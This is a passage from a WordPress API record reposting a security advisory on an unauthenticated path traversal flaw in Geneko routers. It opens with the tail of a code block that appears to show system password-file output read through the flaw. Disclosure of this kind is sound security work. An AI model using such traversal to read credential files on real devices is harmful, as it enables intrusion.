class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10933<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">99999<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0043 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3317\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 16 Jul 2017 07:24:56 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series. Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition, smart metering, remote monitoring and management. GWG supports a variety of radio bands options on 2G, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3317\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Geneko Routers Unauthenticated Path Traversal<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11680,10757],"class_list":["post-8356","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-directory-traversal","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8356"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8356\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8356"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}